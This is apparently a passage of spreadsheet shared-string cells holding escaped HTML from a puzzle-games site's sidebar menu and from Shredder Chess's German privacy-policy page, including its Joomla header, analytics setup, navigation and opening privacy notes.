		&lt;span style="margin-left: 5em;"&gt;USA&lt;br&gt;&lt;/span&gt;
		&lt;hr style="width: 100%; height: 2px;"&gt;
	&lt;/p&gt;
&lt;/div&gt;
&lt;div class=menucol&gt;
	&lt;div id=regmenu&gt;
		&lt;p&gt;&lt;a href="index.html"&gt;Home&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="mobile.html"&gt;Phones &amp; Tablets&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="order.html"&gt;How To Buy&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="journal.html"&gt;Latest News&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="maillist.html"&gt;Mailing Lists&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="contact.html"&gt;Contact us&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="links.html"&gt;Links&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="BlogicallyYours"&gt;Blogically Yours&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;div id=gamemenu style="margin-top: 5px;"&gt;
		&lt;p&gt;&lt;a href="sherwin.html"&gt;Sherlock&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="moriarty.html""&gt;Dinner With Moriarty&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="hotel.html""&gt;Honeycomb Hotel&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="wm.html"&gt;Watson's Map&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="baker.html"&gt;Baker Street&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="sy.html"&gt;Scotland Yard&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="il.html"&gt;Inspector Lestrade&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="mh.html"&gt;Mrs.</t>
  </si>
  <si>
    <t>Hudson&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="rf.html"&gt;Reichenbach Falls&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="qg.html"&gt;Queen's Gambit&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="mm.html"&gt;Mycroft's Map&lt;/a&gt;&lt;/p&gt;
		&lt; p&gt;&lt;a href="hlb.html"&gt;His Last Bow&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;div id=gamemenu style="margin-top: 5px;"&gt;
		&lt;p&gt;&lt;a href="solitile.html"&gt;Solitile&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="lunatile.html"&gt;Lunatile&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="crocotile.html"&gt;Crocotile&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="ft.html"&gt;Flipitile&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;div id=gamemenu style="margin-top: 5px;"&gt;
		&lt;p&gt;&lt;a href="descart.html"&gt;Descartes Enigma&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="dr.html"&gt;Descartes Rainbow&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;div id=gamemenu style="margin-top: 5px;"&gt;
		&lt;p&gt;&lt;a href="knarly.html"&gt;Knarly Works&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="kmazes.html"&gt;Knarly Mazes&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="kjigs.html"&gt;Knarly Jigs&lt;/a&gt;&lt;/p&gt;
		 &lt;p&gt;&lt;a href="kb.html"&gt;Knarly Branches&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="kh.html"&gt;Knarly Hexes&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="kc.html"&gt;Knarly Combs&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="kg.html"&gt;Knarly Gridlock&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="ka.html"&gt;Knarly Asteroids&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;div id=gamemenu style="margin-top: 5px;"&gt;
		&lt;p&gt;&lt;a href="ls.html"&gt;Latin</t>
  </si>
  <si>
    <t>Squares&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="gs.html"&gt;Greek Squares&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;div id=gamemenu style="margin-top: 5px;"&gt;
		&lt;p&gt;&lt;a href="ww.html"&gt;Willa's Walk&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="jj.html"&gt;Jonah's Journey&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="kk.html"&gt;Kinley's Krawl&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="bb.html"&gt;Beckett's Books&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="ff.html"&gt;Fermat's Fences&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="quilt.html"&gt;Occam's Quilt&lt;/a&gt;&lt;/p&gt;
		&lt; p&gt;&lt;a href="fb.html"&gt;Floyd's Bumpershoot&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;div id=gamemenu style="margin-top: 5px;"&gt;
		&lt;p&gt;&lt;a href="mesh.html"&gt;MESH:</t>
  </si>
  <si>
    <t xml:space="preserve">Hero's Hearts&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="mesh.html#defiant"&gt;MESH: Hero Defiant&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="mesh.html#falling"&gt;MESH: Falling Hero&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;a href="mesh.html#friends"&gt;MESH: Hero's Friends&lt;/a&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;&amp;nbsp;&lt;/p&gt;
	&lt;div class=kpix&gt;
		&lt;p&gt;If you enjoy these games, you will certainly enjoy the games at:&lt;/p&gt;
		&lt;p style="margin-left: 0px; margin-right: 0px;"&gt;&lt;a href="http://www.kpixgames.com"&gt;&lt;img src="kpix/KPixGames158.jpg" width="158" height="50"&gt;&lt;/a&gt;&lt;/p&gt;
		&lt;p&gt;&lt;strong&gt;&lt;em&gt;Highly recommended!&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
	&lt;/div&gt;
	&lt;div&gt;&lt;p class=pspace&gt;&amp;nbsp;&lt;/p&gt;&lt;/div&gt;
	&lt;div id=yellowback style="border: 1px #090b69 solid;"&gt;
		&lt;p&gt;&amp;nbsp;&lt;/p&gt;
		&lt;p&gt;&lt;strong&gt;PRIVACY&lt;/strong&gt;&lt;/p&gt;
		&lt;p&gt;&amp;nbsp;&lt;/p&gt;
		&lt;p&gt;We guarantee that we will never sell, rent, give or distribute your personal information (email, address, credit card, etc) to &lt;em&gt;anyone&lt;/em&gt; else.&lt;/p&gt;
		&lt;p&gt;&amp;nbsp;&lt;/p&gt;
		&lt;p style="font-size: 80%;"&gt;&lt;strong&gt;We, too, hate spammers and mad-dog marketeers!&lt;/strong&gt;&lt;/p&gt;
		&lt;p&gt;&amp;nbsp;&lt;/p&gt;
	&lt;/div&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="de-DE" dir="ltr"&gt;
        &lt;head&gt;
            &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
        &lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
         &lt;meta charset="utf-8" /&gt;
	&lt;base href="https://www.shredderchess.com/de/datenschutz.html" /&gt;
	&lt;meta name="keywords" content="chess, computer chess, play chess, chess game, Shredder, Stefan Meyer-Kahlen, computer, chess program, chess download, chess software, chess engine, chess games, Schach, Computerschach, Computer Schach, Schach Download, Shredder, Schachprogramm, Schachcomputer, Schach spielen, Schach Software" /&gt;
	&lt;meta name="description" content="Get the best chess software, 19 times World Computer Chess Champion. Play, learn and improve."</t>
  </si>
  <si>
    <t>/&gt;
	&lt;meta name="generator" content="Joomla! - Open Source Content Management" /&gt;
	&lt;title&gt;Datenschutz - Shredder Chess&lt;/title&gt;
	&lt;link href="https://www.shredderchess.com/de/datenschutz.html" rel="alternate" hreflang="de-DE" /&gt;
	&lt;link href="https://www.shredderchess.com/privacy-policy.html" rel="alternate" hreflang="en-GB" /&gt;
	&lt;link href="/templates/rt_akuatik/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /&gt;
	&lt;link href="/plugins/system/jce/css/content.css?aa754b1f19c7df490be4b958cf085e7c" rel="stylesheet" /&gt;
	&lt;link href="/media/mod_languages/css/template.css?d080eda3d81327b76612a514f0167891" rel="stylesheet" /&gt;
	&lt;link href="/media/gantry5/assets/css/lightcase.css" rel="stylesheet" /&gt;
	&lt;link href="/media/gantry5/engines/nucleus/css-compiled/nucleus.css" rel="stylesheet" /&gt;
	&lt;link href="/templates/rt_akuatik/custom/css-compiled/akuatik_300.css" rel="stylesheet" /&gt;
	&lt;link href="/media/gantry5/assets/css/bootstrap-gantry.css" rel="stylesheet" /&gt;
	&lt;link href="/media/gantry5/engines/nucleus/css-compiled/joomla.css" rel="stylesheet" /&gt;
	&lt;link href="/media/jui/css/icomoon.css" rel="stylesheet" /&gt;
	&lt;link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /&gt;
	&lt;link href="/templates/rt_akuatik/custom/css-compiled/akuatik-joomla_300.css" rel="stylesheet" /&gt;
	&lt;link href="/templates/rt_akuatik/custom/css-compiled/custom_300.css" rel="stylesheet" /&gt;
	&lt;link href="/plugins/system/cookiehint/css/redimstyle.css?d080eda3d81327b76612a514f0167891" rel="stylesheet" /&gt;
	&lt;style&gt;
#redim-cookiehint-bottom {position: fixed; z-index: 99999; left: 0px; right: 0px; bottom: 0px; top: auto !important;}
	&lt;/style&gt;
	&lt;script type="application/json" class="joomla-script-options new"&gt;{"csrf.token":"92661438e7b1d77b462573e3918d5201","system.paths":{"root":"","base":""}}&lt;/script&gt;
	&lt;script src="/media/jui/js/jquery.min.js?d080eda3d81327b76612a514f0167891"&gt;&lt;/script&gt;
	&lt;script src="/media/jui/js/jquery-noconflict.js?d080eda3d81327b76612a514f0167891"&gt;&lt;/script&gt;
	&lt;script src="/media/jui/js/jquery-migrate.min.js?d080eda3d81327b76612a514f0167891"&gt;&lt;/script&gt;
	&lt;script src="/media/system/js/caption.js?d080eda3d81327b76612a514f0167891"&gt;&lt;/script&gt;
	&lt;script src="/media/jui/js/bootstrap.min.js?d080eda3d81327b76612a514f0167891"&gt;&lt;/script&gt;
	&lt;script src="/media/system/js/core.js?d080eda3d81327b76612a514f0167891"&gt;&lt;/script&gt;
	&lt;script src="/media/jui/js/jquery.ui.core.min.js?d080eda3d81327b76612a514f0167891"&gt;&lt;/script&gt;
	&lt;script src="https://www.googletagmanager.com/gtag/js?id=UA-6426331-1" async&gt;&lt;/script&gt;
	&lt;script&gt;
jQuery(window).on('load',  function() {
				new JCaption('img.caption');
			});_x005F_x000D_      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'UA-6426331-1');
              gtag('set', { 'anonymize_ip': true });
          _</t>
  </si>
  <si>
    <t>x000D_function plus() {
	var iframe = document.getElementById("blockrandom");
	if (iframe != null) {
		iframe.contentWindow.zoom_plus();
	}
}
function minus() {
	var iframe = document.getElementById("blockrandom");
	if (iframe != null) {
		iframe.contentWindow.zoom_minus();
	}
}
	&lt;/script&gt;
	&lt;link href="https://www.shredderchess.com/privacy-policy.html" rel="alternate" hreflang="x-default" /&gt;
&lt;/head&gt;
    &lt;body class="gantry site com_content view-article no-layout no-task dir-ltr itemid-344 outline-300 g-offcanvas-left g-default g-style-preset1"&gt;
        &lt;div id="g-offcanvas"  data-g-offcanvas-swipe="0" data-g-offcanvas-css3="1"&gt;
                        &lt;div class="g-grid"&gt;                        
        &lt;div class="g-block size-100"&gt;
             &lt;div id="mobile-menu-4620-particle" class="g-content g-particle"&gt;            &lt;div id="g-mobilemenu-container" data-g-menu-breakpoint="51rem"&gt;&lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
            &lt;/div&gt;
    &lt;/div&gt;
        &lt;div id="g-page-surround"&gt;
            &lt;div class="g-offcanvas-hide g-offcanvas-toggle" role="navigation" data-offcanvas-toggle aria-controls="g-offcanvas" aria-expanded="false"&gt;&lt;i class="fa fa-fw fa-bars"&gt;&lt;/i&gt;&lt;/div&gt;                        
                &lt;section id="g-top"&gt;
                                        &lt;div class="g-grid"&gt;                        
        &lt;div class="g-block size-100"&gt;
             &lt;div class="g-system-messages"&gt;
&lt;div id="system-message-container"&gt;
    &lt;/div&gt;
    &lt;/div&gt;
        &lt;/div&gt;
            &lt;/div&gt;
    &lt;/section&gt;
                &lt;section id="g-navigation" class="nopaddingbottom"&gt;
                                        &lt;div class="g-grid"&gt;                        
        &lt;div class="g-block size-10"&gt;
             &lt;div id="logo-4326-particle" class="g-content g-particle"&gt;            &lt;a href="/" class="g-logo g-logo-akuatik" target="_self" title="" rel="home"&gt;
            &lt;img src="/templates/rt_akuatik/custom/images/logo.png" alt="" /&gt;
            &lt;/a&gt;
            &lt;/div&gt;
        &lt;/div&gt;
        &lt;div class="g-block size-76 nopaddingleft nopaddingright center"&gt;
             &lt;div id="menu-7130-particle" class="g-content g-particle"&gt;            &lt;nav class="g-main-nav" data-g-hover-expand="true"&gt;
        &lt;ul class="g-toplevel"&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-276 g-standard  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/"&gt;
                                                &lt;i class="fa fa-home" aria-hidden="true"&gt;&lt;/i&gt;
                                                    &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Home&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-separator g-menu-item-335 g-parent g-standard  "&gt;
                            &lt;div class="g-menu-item-container" data-g-menuparent=""&gt;                                    &lt;i class="fa fa-windows" aria-hidden="true"&gt;&lt;/i&gt;
                                                                            &lt;span class="g-separator g-menu-item-content"&gt;            &lt;span class="g-menu-item-title"&gt;Windows&lt;/span&gt;
            &lt;/span&gt;
                                        &lt;span class="g-menu-parent-indicator"&gt;&lt;/span&gt;                            &lt;/div&gt;                                                                &lt;ul class="g-dropdown g-inactive g-fade g-dropdown-right"&gt;
            &lt;li class="g-dropdown-column"&gt;
                        &lt;div class="g-grid"&gt;
                        &lt;div class="g-block size-100"&gt;
            &lt;ul class="g-sublevel"&gt;
                &lt;li class="g-level-1 g-go-back"&gt;
                    &lt;a class="g-menu-item-container" href="#" data-g-menuparent=""&gt;&lt;span&gt;Back&lt;/span&gt;&lt;/a&gt;
                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-346  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/windows/deep-shredder-13.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Shredder 13 Serie&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-347  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/windows/chess-tutor.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Chess Tutor&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
            &lt;/ul&gt;
        &lt;/div&gt;
            &lt;/div&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
            &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-separator g-menu-item-336 g-parent g-standard  "&gt;
                            &lt;div class="g-menu-item-container" data-g-menuparent=""&gt;                                    &lt;i class="fa fa-apple" aria-hidden="true"&gt;&lt;/i&gt;
                                                                            &lt;span class="g-separator g-menu-item-content"&gt;            &lt;span class="g-menu-item-title"&gt;Mac&lt;/span&gt;
            &lt;/span&gt;
                                        &lt;span class="g-menu-parent-indicator"&gt;&lt;/span&gt;                            &lt;/div&gt;                                                                &lt;ul class="g-dropdown</t>
  </si>
  <si>
    <t>g-inactive g-fade g-dropdown-right"&gt;
            &lt;li class="g-dropdown-column"&gt;
                        &lt;div class="g-grid"&gt;
                        &lt;div class="g-block size-100"&gt;
            &lt;ul class="g-sublevel"&gt;
                &lt;li class="g-level-1 g-go-back"&gt;
                    &lt;a class="g-menu-item-container" href="#" data-g-menuparent=""&gt;&lt;span&gt;Back&lt;/span&gt;&lt;/a&gt;
                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-348  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/mac/deep-shredder-13.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Shredder 13 Serie&lt;/span&gt;
                    &lt;/span&gt;
                                                 &lt;/a&gt;
                                &lt;/li&gt;
            &lt;/ul&gt;
        &lt;/div&gt;
            &lt;/div&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
            &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-separator g-menu-item-337 g-parent g-standard  "&gt;
                            &lt;div class="g-menu-item-container" data-g-menuparent=""&gt;                                    &lt;i class="fa fa-linux" aria-hidden="true"&gt;&lt;/i&gt;
                                                                            &lt;span class="g-separator g-menu-item-content"&gt;            &lt;span class="g-menu-item-title"&gt;Linux&lt;/span&gt;
            &lt;/span&gt;
                                         &lt;span class="g-menu-parent-indicator"&gt;&lt;/span&gt;                            &lt;/div&gt;                                                                &lt;ul class="g-dropdown</t>
  </si>
  <si>
    <t>g-inactive g-fade g-dropdown-right"&gt;
            &lt;li class="g-dropdown-column"&gt;
                        &lt;div class="g-grid"&gt;
                        &lt;div class="g-block size-100"&gt;
            &lt;ul class="g-sublevel"&gt;
                &lt;li class="g-level-1 g-go-back"&gt;
                    &lt;a class="g-menu-item-container" href="#" data-g-menuparent=""&gt;&lt;span&gt;Back&lt;/span&gt;&lt;/a&gt;
                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-349  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/linux/deep-shredder-13.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Shredder 13 Serie&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
            &lt;/ul&gt;
        &lt;/div&gt;
            &lt;/div&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
            &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-separator g-menu-item-338 g-parent g-standard  "&gt;
                            &lt;div class="g-menu-item-container" data-g-menuparent=""&gt;                                    &lt;i class="fa fa-mobile" aria-hidden="true"&gt;&lt;/i&gt;
                                                                            &lt;span class="g-separator g-menu-item-content"&gt;             &lt;span class="g-menu-item-title"&gt;Mobil&lt;/span&gt;
            &lt;/span&gt;
                                        &lt;span class="g-menu-parent-indicator"&gt;&lt;/span&gt;                            &lt;/div&gt;                                                                &lt;ul class="g-dropdown</t>
  </si>
  <si>
    <t xml:space="preserve">g-inactive g-fade g-dropdown-right"&gt;
            &lt;li class="g-dropdown-column"&gt;
                        &lt;div class="g-grid"&gt;
                        &lt;div class="g-block size-100"&gt;
            &lt;ul class="g-sublevel"&gt;
                &lt;li class="g-level-1 g-go-back"&gt;
                    &lt;a class="g-menu-item-container" href="#" data-g-menuparent=""&gt;&lt;span&gt;Back&lt;/span&gt;&lt;/a&gt;
                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-350  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/mobil/shredder-schach-iphone.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Shredder für iPhone&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-351  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/mobil/shredder-schach-ipad.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Shredder für iPad&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-352  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/mobil/shredder-schach-android.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Shredder für Android&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
            &lt;/ul&gt;
        &lt;/div&gt;
            &lt;/div&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
            &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-separator g-menu-item-339 g-parent g-standard  "&gt;
                            &lt;div class="g-menu-item-container" data-g-menuparent=""&gt;                                    &lt;i class="fa fa-feed" aria-hidden="true"&gt;&lt;/i&gt;
                                                                            &lt;span class="g-separator g-menu-item-content"&gt;            &lt;span class="g-menu-item-title"&gt;Online&lt;/span&gt;
            &lt;/span&gt;
                                        &lt;span class="g-menu-parent-indicator"&gt;&lt;/span&gt;                            &lt;/div&gt;                                                                &lt;ul class="g-dropdown g-inactive g-fade g-dropdown-right"&gt;
            &lt;li class="g-dropdown-column"&gt;
                        &lt;div class="g-grid"&gt;
                        &lt;div class="g-block size-100"&gt;
            &lt;ul class="g-sublevel"&gt;
                &lt;li class="g-level-1 g-go-back"&gt;
                    &lt;a class="g-menu-item-container" href="#" data-g-menuparent=""&gt;&lt;span&gt;Back&lt;/span&gt;&lt;/a&gt;
                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-353  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/online/online-schach-spielen.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Spiel gegen Shredder&lt;/span&gt;
                    &lt;/span&gt;
                                                </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/a&gt;
                                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-354  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/online/schachproblem-des-tages.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Aufgabe des Tages&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-355  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/online/eroeffnungs-datenbank.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Eröffnungsdatenbank&lt;/span&gt;
                     &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-356  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/online/endspiel-datenbank.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Endspieldatenbank&lt;/span&gt;
                    &lt;/span&gt;
                                                &lt;/a&gt;
                                &lt;/li&gt;
        &lt;li class="g-menu-item g-menu-item-type-component g-menu-item-462  "&gt;
                            &lt;a class="g-menu-item-container" href="/de/online/spiele-schach-online-mit-freunden.html"&gt;
                                                                &lt;span class="g-menu-item-content"&gt;
                                    &lt;span class="g-menu-item-title"&gt;Spiel Schach Online&lt;/span&gt;
                    &lt;/span&gt;
                                                 &lt;/a&gt;
                                &lt;/li&gt;
            &lt;/ul&gt;
        &lt;/div&gt;
            &lt;/div&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
    &lt;/nav&gt;
            &lt;/div&gt;
        &lt;/div&gt;
        &lt;div class="g-block size-14"&gt;
             &lt;div class="g-content"&gt;
                                    &lt;div class="platform-content"&gt;&lt;div class="moduletable "&gt;
						&lt;div class="mod-languages"&gt;
	&lt;ul class="lang-inline" dir="ltr"&gt;
									&lt;li class="lang-active"&gt;
			&lt;a href="https://www.shredderchess.com/de/datenschutz.html"&gt;
							DE						&lt;/a&gt;
			</t>
  </si>
  <si>
    <t>&lt;/li&gt;
								&lt;li&gt;
			&lt;a href="/en/privacy-policy.html"&gt;
							EN						&lt;/a&gt;
			&lt;/li&gt;
				&lt;/ul&gt;
&lt;/div&gt;
		&lt;/div&gt;&lt;/div&gt;
        &lt;/div&gt;
        &lt;/div&gt;
            &lt;/div&gt;
    &lt;/section&gt;
                &lt;header id="g-header" class="nomargintop nopaddingtop section-horizontal-paddings nopaddingbottom"&gt;
                                        &lt;div class="g-grid"&gt;                        
        &lt;div class="g-block size-100 hidden-phone"&gt;
             &lt;div class="g-content"&gt;
                                    &lt;div class="platform-content"&gt;&lt;div class="moduletable "&gt;
&lt;div class="custom"  &gt;
	&lt;p&gt;&lt;img src="/images/IMG_6615_header_sw.jpg" alt="Shredder Computer Chess" width="1920" height="387" /&gt;&lt;/p&gt;&lt;/div&gt;
		&lt;/div&gt;&lt;/div&gt;
        &lt;/div&gt;
        &lt;/div&gt;
            &lt;/div&gt;
    &lt;/header&gt;
                &lt;section id="g-container-main" class="g-wrapper"&gt;
                            &lt;div class="g-grid"&gt;                        
        &lt;div class="g-block size-100"&gt;
             &lt;main id="g-mainbar" class="section-horizontal-paddings"&gt;
                                        &lt;div class="g-grid"&gt;                        
        &lt;div class="g-block size-100"&gt;
             &lt;div class="g-content"&gt;
                                                            &lt;div class="platform-content row-fluid"&gt;&lt;div class="span12"&gt;&lt;div class="item-page" itemscope itemtype="https://schema.org/Article"&gt;
	&lt;meta itemprop="inLanguage" content="de-DE" /&gt;
								&lt;div itemprop="articleBody"&gt;
		&lt;h2&gt;Datenschutzrichtlinie&lt;br /&gt; &lt;b&gt;&lt;span style="font-size: 12pt;"&gt;1. Datenschutz auf einen Blick&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Allgemeine Hinweise&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Die folgenden Hinweise geben einen einfachen Überblick darüber, was mit Ihren personenbezogenen Daten passiert, wenn Sie unsere Website besuchen.</t>
  </si>
  <si>
    <t>Personenbezogene Daten sind alle Daten, mit denen Sie persönlich identifiziert werden können. Ausführliche Informationen zum Thema Datenschutz entnehmen Sie unserer unter diesem Text aufgeführten Datenschutzerklärung.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Datenerfassung auf unserer Website&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;Wer ist verantwortlich für die Datenerfassung auf dieser Website?&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Die Datenverarbeitung auf dieser Website erfolgt durch den Websitebetreiber. Dessen Kontaktdaten können Sie dem Impressum dieser Website entnehmen.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;Wie erfassen wir Ihre Daten?&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Ihre Daten werden zum einen dadurch erhoben, dass Sie uns diese mitteilen.</t>
  </si>
  <si>
    <t>Hierbei kann es sich z.B. um Daten handeln, die Sie in ein Kontaktformular eingeben.&lt;/p&gt;_x005F_x000D_
 &lt;p&gt;Andere Daten werden automatisch beim Besuch der Website durch unsere IT-Systeme erfasst. Das sind vor allem technische Daten (z.B. Internetbrowser, Betriebssystem oder Uhrzeit des Seitenaufrufs).</t>
  </si>
  <si>
    <t>Die Erfassung dieser Daten erfolgt automatisch, sobald Sie unsere Website betreten.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;Wofür nutzen wir Ihre Daten?&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Ein Teil der Daten wird erhoben, um eine fehlerfreie Bereitstellung der Website zu gewährleisten. Andere Daten können zur Analyse Ihres Nutzerverhaltens verwendet werden.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;b&gt;Welche Rechte haben Sie bezüglich Ihrer Daten?&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Sie haben jederzeit das Recht unentgeltlich Auskunft über Herkunft, Empfänger und Zweck Ihrer gespeicherten personenbezogenen Daten zu erhalten. Sie haben außerdem ein Recht, die Berichtigung, Sperrung oder Löschung dieser Daten zu verlangen.</t>
  </si>
  <si>
    <t>Hierzu sowie zu weiteren Fragen zum Thema Datenschutz können Sie sich jederzeit unter der im Impressum angegebenen Adresse an uns wenden.</t>
  </si>
  <si>
    <t>Des Weiteren steht Ihnen ein Beschwerderecht bei der zuständigen Aufsichtsbehörde zu.&lt;/p&gt;_x005F_x000D_
